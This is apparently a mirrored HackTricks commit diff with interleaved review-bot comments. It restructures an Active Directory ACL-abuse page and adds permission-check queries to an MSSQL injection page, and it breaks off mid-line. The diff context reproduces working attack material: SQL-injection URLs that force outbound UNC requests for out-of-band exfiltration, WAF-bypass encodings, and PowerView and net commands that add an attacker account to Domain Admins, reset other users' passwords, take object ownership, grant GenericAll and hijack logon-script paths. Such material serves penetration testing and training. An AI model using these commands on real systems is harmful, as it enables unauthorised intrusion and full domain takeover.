mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [#3592] No subject
This commit is contained in:
parent
f9c0ea6c24
commit
bd0b87e02c
7 changed files with 205 additions and 69 deletions
|
@ -161,7 +161,8 @@
|
||||||
* [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
|
* [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
|
||||||
* [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
|
* [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
|
||||||
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
|
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
|
||||||
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
|
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md)
|
||||||
|
* [Shadow Credentials](windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md)
|
||||||
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
|
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
|
||||||
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
|
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
|
||||||
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
|
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
|
||||||
|
|
|
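Review bot: the `Abusing Active Directory ACLs/ACEs` entry now points at `acl-persistence-abuse/README.md` instead of `acl-persistence-abuse.md`, which changes the published URL of an existing page; add a redirect for the old path (GitBook reads a `redirects:` map from `.gitbook.yaml`) so inbound links and bookmarks keep resolving. Also check that the new `* [Shadow Credentials](.../acl-persistence-abuse/shadow-credentials.md)` line is indented one level under that entry in SUMMARY.md, otherwise it renders as a sibling page rather than a child of the ACL page.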
@ -63,6 +63,14 @@ https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_f
|
||||||
|
|
||||||
**Permissions:** Requires **`VIEW SERVER STATE`** permission on the server.
|
**Permissions:** Requires **`VIEW SERVER STATE`** permission on the server.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
|
||||||
|
# Or doing
|
||||||
|
Use master;
|
||||||
|
EXEC sp_helprotect 'fn_xe_file_target_read_file';
|
||||||
|
```
|
||||||
|
|
||||||
### `fn_get_audit_file`
|
### `fn_get_audit_file`
|
||||||
|
|
||||||
```
|
```
|
||||||
|
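Review bot: the new `sql` block uses `#` for its comments (`# Check if you have it`, `# Or doing`), which is not a T-SQL comment marker, so the block fails on its first line if pasted into a query window as written; use `--` (or `/* ... */`) instead, e.g. `-- Check if you have it`. The check itself is sound: `fn_my_permissions(NULL, 'SERVER')` lists the effective server-level permissions of the current login, so an empty result for `VIEW SERVER STATE` means the `fn_xe_file_target_read_file` call in the context line above will be denied rather than the injection being broken.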
@ -73,6 +81,14 @@ https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_aud
|
||||||
|
|
||||||
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
|
||||||
|
# Or doing
|
||||||
|
Use master;
|
||||||
|
EXEC sp_helprotect 'fn_get_audit_file';
|
||||||
|
```
|
||||||
|
|
||||||
### `fn_trace_gettabe`
|
### `fn_trace_gettabe`
|
||||||
|
|
||||||
```
|
```
|
||||||
|
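Review bot: `EXEC sp_helprotect 'fn_get_audit_file';` does not check what the section says it checks: `sp_helprotect` reports permissions granted on an object or statement in the current database, not server-level permissions such as `CONTROL SERVER`, and it is a deprecated procedure that Microsoft points away from in favour of `fn_my_permissions` and `sys.database_permissions`. Keep the `fn_my_permissions(NULL, 'SERVER')` query as the authoritative test and either drop the `sp_helprotect` alternative or caveat it; the `#` comment lines in this block also need the `--` T-SQL comment syntax.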
@ -83,6 +99,14 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2
|
||||||
|
|
||||||
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
|
||||||
|
# Or doing
|
||||||
|
Use master;
|
||||||
|
EXEC sp_helprotect 'fn_trace_gettabe';
|
||||||
|
```
|
||||||
|
|
||||||
### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
|
### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
|
||||||
|
|
||||||
The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
|
The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
|
||||||
|
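Review bot: `EXEC sp_helprotect 'fn_trace_gettabe';` carries the typo from the section heading: the function is `fn_trace_gettable`, as the hunk header's own URL spells it (`fn_trace_gettable('\\'...`), so the added statement names a non-existent object and returns nothing useful. Correct the name in the added line and in the `### \`fn_trace_gettabe\`` heading, and switch the `#` comment lines to `--` so the block is valid T-SQL.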
@ -135,7 +159,7 @@ public partial class UserDefinedFunctions
|
||||||
|
|
||||||
In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`)
|
In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`)
|
||||||
|
|
||||||
```
|
```sql
|
||||||
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
|
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
|
||||||
```
|
```
|
||||||
|
|
||||||
|
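Review bot: tagging the fence as `sql` is right, but the `sp_add_trusted_assembly` line needs one sentence of explanation: the `0x35acf108...` value is the SHA-512 of one specific compiled `HttpDb` binary, so anyone rebuilding the assembly from the source above gets a different hash and `CREATE ASSEMBLY` is still rejected. Show how to recompute it from the DLL that will actually be loaded, e.g. `SELECT HASHBYTES('SHA2_512', BulkColumn) FROM OPENROWSET(BULK 'C:\path\to\HttpDb.dll', SINGLE_BLOB) AS f;`, and note that `sys.trusted_assemblies` (already mentioned in the context line) is also where a defender will find such an entry after the fact.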
@ -181,6 +205,11 @@ https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_
|
||||||
|
|
||||||
**Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.
|
**Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
|
||||||
|
```
|
||||||
|
|
||||||
## **Little tricks for WAF bypasses**
|
## **Little tricks for WAF bypasses**
|
||||||
|
|
||||||
Non-standard whitespace characters: %C2%85 или %C2%A0:
|
Non-standard whitespace characters: %C2%85 или %C2%A0:
|
||||||
|
|
|
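Review bot: the block added under the `sys.dm_exec_*` permission note is shorter than its siblings (no `sp_helprotect` alternative), which is the better form since `sp_helprotect` does not report server-level permissions, but `# Check if you have it` still needs the `--` T-SQL comment marker. A one-line reminder of what a miss means would also help readers: without `VIEW SERVER STATE` the query in the hunk header returns only the caller's own session text, so an empty result is a permission gap, not a failed injection.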
@ -333,8 +333,8 @@ It's possible to gain code execution with **elevated privileges on a remote comp
|
||||||
|
|
||||||
The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
|
The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
|
||||||
|
|
||||||
{% content-ref url="acl-persistence-abuse.md" %}
|
{% content-ref url="acl-persistence-abuse/" %}
|
||||||
[acl-persistence-abuse.md](acl-persistence-abuse.md)
|
[acl-persistence-abuse](acl-persistence-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Printer Spooler service abuse
|
### Printer Spooler service abuse
|
||||||
|
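Review bot: `{% content-ref url="acl-persistence-abuse/" %}` now references the folder created by this commit's SUMMARY.md change rather than a file, and only resolves if `acl-persistence-abuse/README.md` exists on disk; this hunk therefore must not be split from the SUMMARY.md and file-move changes. The same substitution appears a second time further down this file (the persistence section), so both occurrences need to stay in sync.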
@ -465,8 +465,8 @@ There is a **local administrator** account inside each **DC**. Having admin priv
|
||||||
|
|
||||||
You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.
|
You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.
|
||||||
|
|
||||||
{% content-ref url="acl-persistence-abuse.md" %}
|
{% content-ref url="acl-persistence-abuse/" %}
|
||||||
[acl-persistence-abuse.md](acl-persistence-abuse.md)
|
[acl-persistence-abuse](acl-persistence-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Security Descriptors
|
### Security Descriptors
|
||||||
|
|
|
@ -12,8 +12,6 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
**This information was mostly copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
|
|
||||||
|
|
||||||
## Context
|
## Context
|
||||||
|
|
||||||
This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
|
This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
|
||||||
|
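Review bot: deleting the top-of-page attribution to ired.team is acceptable only because the `@ -508,6 +511,7` hunk of this same commit re-adds it under `## References`; if the commit is ever split or partially reverted, the copied text loses its source credit, so keep the two hunks together. While touching this region, `Acccess` in the context line `Acccess Control Entries (ACEs)` has a stray `c`.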
@ -22,7 +20,7 @@ Active Directory objects such as users and groups are securable objects and DACL
|
||||||
|
|
||||||
An example of ACEs for the "Domain Admins" securable object can be seen here:
|
An example of ACEs for the "Domain Admins" securable object can be seen here:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/1 (1).png>)
|
![](<../../../.gitbook/assets/1 (1).png>)
|
||||||
|
|
||||||
Some of the Active Directory object permissions and types that we as attackers are interested in:
|
Some of the Active Directory object permissions and types that we as attackers are interested in:
|
||||||
|
|
||||||
|
@ -48,7 +46,7 @@ Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRigh
|
||||||
|
|
||||||
We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account:
|
We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account:
|
||||||
|
|
||||||
![](../../.gitbook/assets/2.png)
|
![](../../../.gitbook/assets/2.png)
|
||||||
|
|
||||||
* **Change password**: You could just change the password of that user with
|
* **Change password**: You could just change the password of that user with
|
||||||
|
|
||||||
|
@ -83,7 +81,7 @@ Let's see if `Domain admins` group has any weak permissions. First of, let's get
|
||||||
Get-NetGroup "domain admins" -FullData
|
Get-NetGroup "domain admins" -FullData
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/4.png)
|
![](../../../.gitbook/assets/4.png)
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}
|
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}
|
||||||
|
@ -91,7 +89,7 @@ Get-NetGroup "domain admins" -FullData
|
||||||
|
|
||||||
We can see that our attacking user `spotless` has `GenericAll` rights once again:
|
We can see that our attacking user `spotless` has `GenericAll` rights once again:
|
||||||
|
|
||||||
![](../../.gitbook/assets/5.png)
|
![](../../../.gitbook/assets/5.png)
|
||||||
|
|
||||||
Effectively, this allows us to add ourselves (the user `spotless`) to the `Domain Admin` group:
|
Effectively, this allows us to add ourselves (the user `spotless`) to the `Domain Admin` group:
|
||||||
|
|
||||||
|
@ -99,7 +97,7 @@ Effectively, this allows us to add ourselves (the user `spotless`) to the `Domai
|
||||||
net group "domain admins" spotless /add /domain
|
net group "domain admins" spotless /add /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/6.gif)
|
![](../../../.gitbook/assets/6.gif)
|
||||||
|
|
||||||
Same could be achieved with Active Directory or PowerSploit module:
|
Same could be achieved with Active Directory or PowerSploit module:
|
||||||
|
|
||||||
|
@ -111,16 +109,21 @@ Add-ADGroupMember -Identity "domain admins" -Members spotless
|
||||||
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
|
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
|
||||||
```
|
```
|
||||||
|
|
||||||
## GenericAll / GenericWrite / Write on Computer
|
## GenericAll / GenericWrite / Write on Computer/User
|
||||||
|
|
||||||
* If you have these privileges on a Computer object, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](resource-based-constrained-delegation.md) off.
|
* If you have these privileges on a **Computer object**, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](../resource-based-constrained-delegation.md) off.
|
||||||
* If you have these privs over a user, you
|
* If you have these privs over a user, you can use one of the [first methods explained in this page](./#genericall-on-user).
|
||||||
|
* Or, either you have it in a Computer or a user you can use **Shadow Credentials** to impersonate it:
|
||||||
|
|
||||||
|
{% content-ref url="shadow-credentials.md" %}
|
||||||
|
[shadow-credentials.md](shadow-credentials.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## WriteProperty on Group
|
## WriteProperty on Group
|
||||||
|
|
||||||
If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group:
|
If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group:
|
||||||
|
|
||||||
![](../../.gitbook/assets/7.png)
|
![](../../../.gitbook/assets/7.png)
|
||||||
|
|
||||||
We can again add ourselves to the `Domain Admins` group and escalate privileges:
|
We can again add ourselves to the `Domain Admins` group and escalate privileges:
|
||||||
|
|
||||||
|
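Review bot: the new bullet `Or, either you have it in a Computer or a user you can use **Shadow Credentials** to impersonate it:` is ungrammatical; suggest `Whether you hold these rights over a computer or a user, you can also use **Shadow Credentials** to impersonate it:`. The heading now reads `GenericAll / GenericWrite / Write on Computer/User`, but the linked shadow-credentials page added in this commit scopes the technique to write access on the `msDS-KeyCredentialLink` attribute, so say that explicitly here: it is the concrete right an attacker needs and the concrete attribute whose modifications a defender auditing directory changes should alert on.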
@ -128,19 +131,19 @@ We can again add ourselves to the `Domain Admins` group and escalate privileges:
|
||||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/8.png)
|
![](../../../.gitbook/assets/8.png)
|
||||||
|
|
||||||
## Self (Self-Membership) on Group
|
## Self (Self-Membership) on Group
|
||||||
|
|
||||||
Another privilege that enables the attacker adding themselves to a group:
|
Another privilege that enables the attacker adding themselves to a group:
|
||||||
|
|
||||||
![](../../.gitbook/assets/9.png)
|
![](../../../.gitbook/assets/9.png)
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/10.png)
|
![](../../../.gitbook/assets/10.png)
|
||||||
|
|
||||||
## WriteProperty (Self-Membership)
|
## WriteProperty (Self-Membership)
|
||||||
|
|
||||||
|
@ -150,13 +153,13 @@ One more privilege that enables the attacker adding themselves to a group:
|
||||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/11.png)
|
![](../../../.gitbook/assets/11.png)
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
net group "domain admins" spotless /add /domain
|
net group "domain admins" spotless /add /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/12.png)
|
![](../../../.gitbook/assets/12.png)
|
||||||
|
|
||||||
## **ForceChangePassword**
|
## **ForceChangePassword**
|
||||||
|
|
||||||
|
@ -166,7 +169,7 @@ If we have `ExtendedRight` on `User-Force-Change-Password` object type, we can r
|
||||||
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/13.png)
|
![](../../../.gitbook/assets/13.png)
|
||||||
|
|
||||||
Doing the same with powerview:
|
Doing the same with powerview:
|
||||||
|
|
||||||
|
@ -174,7 +177,7 @@ Doing the same with powerview:
|
||||||
Set-DomainUserPassword -Identity delegate -Verbose
|
Set-DomainUserPassword -Identity delegate -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/14.png)
|
![](../../../.gitbook/assets/14.png)
|
||||||
|
|
||||||
Another method that does not require fiddling with password-secure-string conversion:
|
Another method that does not require fiddling with password-secure-string conversion:
|
||||||
|
|
||||||
|
@ -183,7 +186,7 @@ $c = Get-Credential
|
||||||
Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
|
Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/15.png)
|
![](../../../.gitbook/assets/15.png)
|
||||||
|
|
||||||
...or a one liner if no interactive session is not available:
|
...or a one liner if no interactive session is not available:
|
||||||
|
|
||||||
|
@ -191,7 +194,7 @@ Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
|
||||||
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
|
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/16.png)
|
![](../../../.gitbook/assets/16.png)
|
||||||
|
|
||||||
and one last way yo achieve this from linux:
|
and one last way yo achieve this from linux:
|
||||||
|
|
||||||
|
@ -210,7 +213,7 @@ More info:
|
||||||
|
|
||||||
Note how before the attack the owner of `Domain Admins` is `Domain Admins`:
|
Note how before the attack the owner of `Domain Admins` is `Domain Admins`:
|
||||||
|
|
||||||
![](../../.gitbook/assets/17.png)
|
![](../../../.gitbook/assets/17.png)
|
||||||
|
|
||||||
After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All`
|
After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All`
|
||||||
|
|
||||||
|
@ -218,7 +221,7 @@ After the ACE enumeration, if we find that a user in our control has `WriteOwner
|
||||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/18.png)
|
![](../../../.gitbook/assets/18.png)
|
||||||
|
|
||||||
...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group:
|
...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group:
|
||||||
|
|
||||||
|
@ -228,7 +231,7 @@ Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -Ow
|
||||||
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/19.png)
|
![](../../../.gitbook/assets/19.png)
|
||||||
|
|
||||||
## GenericWrite on User
|
## GenericWrite on User
|
||||||
|
|
||||||
|
@ -236,7 +239,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
||||||
Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/20.png)
|
![](../../../.gitbook/assets/20.png)
|
||||||
|
|
||||||
`WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
|
`WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
|
||||||
|
|
||||||
|
@ -246,7 +249,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\
|
||||||
|
|
||||||
Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:
|
Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:
|
||||||
|
|
||||||
![](../../.gitbook/assets/21.png)
|
![](../../../.gitbook/assets/21.png)
|
||||||
|
|
||||||
## GenericWrite on Group
|
## GenericWrite on Group
|
||||||
|
|
||||||
|
@ -268,7 +271,7 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use
|
||||||
|
|
||||||
If you are the owner of a group, like I'm the owner of a `Test` AD group:
|
If you are the owner of a group, like I'm the owner of a `Test` AD group:
|
||||||
|
|
||||||
![](../../.gitbook/assets/22.png)
|
![](../../../.gitbook/assets/22.png)
|
||||||
|
|
||||||
Which you can of course do through powershell:
|
Which you can of course do through powershell:
|
||||||
|
|
||||||
|
@ -276,13 +279,13 @@ Which you can of course do through powershell:
|
||||||
([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
|
([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/23.png)
|
![](../../../.gitbook/assets/23.png)
|
||||||
|
|
||||||
And you have a `WriteDACL` on that AD object:
|
And you have a `WriteDACL` on that AD object:
|
||||||
|
|
||||||
![](../../.gitbook/assets/24.png)
|
![](../../../.gitbook/assets/24.png)
|
||||||
|
|
||||||
...you can give yourself [`GenericAll`](../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery:
|
...you can give yourself [`GenericAll`](../../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery:
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
|
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
|
||||||
|
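Review bot: the re-pathed link `[GenericAll](../../../windows/active-directory-methodology/broken-reference/)` is still a dead link: its target is literally named `broken-reference`, and the `windows/` tree does not match the `windows-hardening/active-directory-methodology/...` paths used everywhere else in this commit. Point it at the `GenericAll on User` section of this same page (`./#genericall-on-user`, the anchor already used earlier in this file) or drop the link and keep the plain `GenericAll` text.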
@ -294,7 +297,7 @@ $ADSI.psbase.commitchanges()
|
||||||
|
|
||||||
Which means you now fully control the AD object:
|
Which means you now fully control the AD object:
|
||||||
|
|
||||||
![](../../.gitbook/assets/25.png)
|
![](../../../.gitbook/assets/25.png)
|
||||||
|
|
||||||
This effectively means that you can now add new users to the group.
|
This effectively means that you can now add new users to the group.
|
||||||
|
|
||||||
|
@ -308,18 +311,18 @@ $acl.AddAccessRule($ace)
|
||||||
Set-Acl -Path $path -AclObject $acl
|
Set-Acl -Path $path -AclObject $acl
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/26.png)
|
![](../../../.gitbook/assets/26.png)
|
||||||
|
|
||||||
## **Replication on the domain (DCSync)**
|
## **Replication on the domain (DCSync)**
|
||||||
|
|
||||||
The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\
|
The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\
|
||||||
[**Learn more about the DCSync attack here.**](dcsync.md)
|
[**Learn more about the DCSync attack here.**](../dcsync.md)
|
||||||
|
|
||||||
## GPO Delegation <a href="#gpo-delegation" id="gpo-delegation"></a>
|
## GPO Delegation <a href="#gpo-delegation" id="gpo-delegation"></a>
|
||||||
|
|
||||||
Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user:
|
Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a13.png)
|
![](../../../.gitbook/assets/a13.png)
|
||||||
|
|
||||||
We can see this by leveraging PowerView like so:
|
We can see this by leveraging PowerView like so:
|
||||||
|
|
||||||
|
@ -329,13 +332,13 @@ Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
|
|
||||||
The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse:
|
The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a14.png)
|
![](../../../.gitbook/assets/a14.png)
|
||||||
|
|
||||||
### Enumerate GPO Permissions <a href="#abusing-the-gpo-permissions" id="abusing-the-gpo-permissions"></a>
|
### Enumerate GPO Permissions <a href="#abusing-the-gpo-permissions" id="abusing-the-gpo-permissions"></a>
|
||||||
|
|
||||||
We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below:
|
We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below:
|
||||||
|
|
||||||
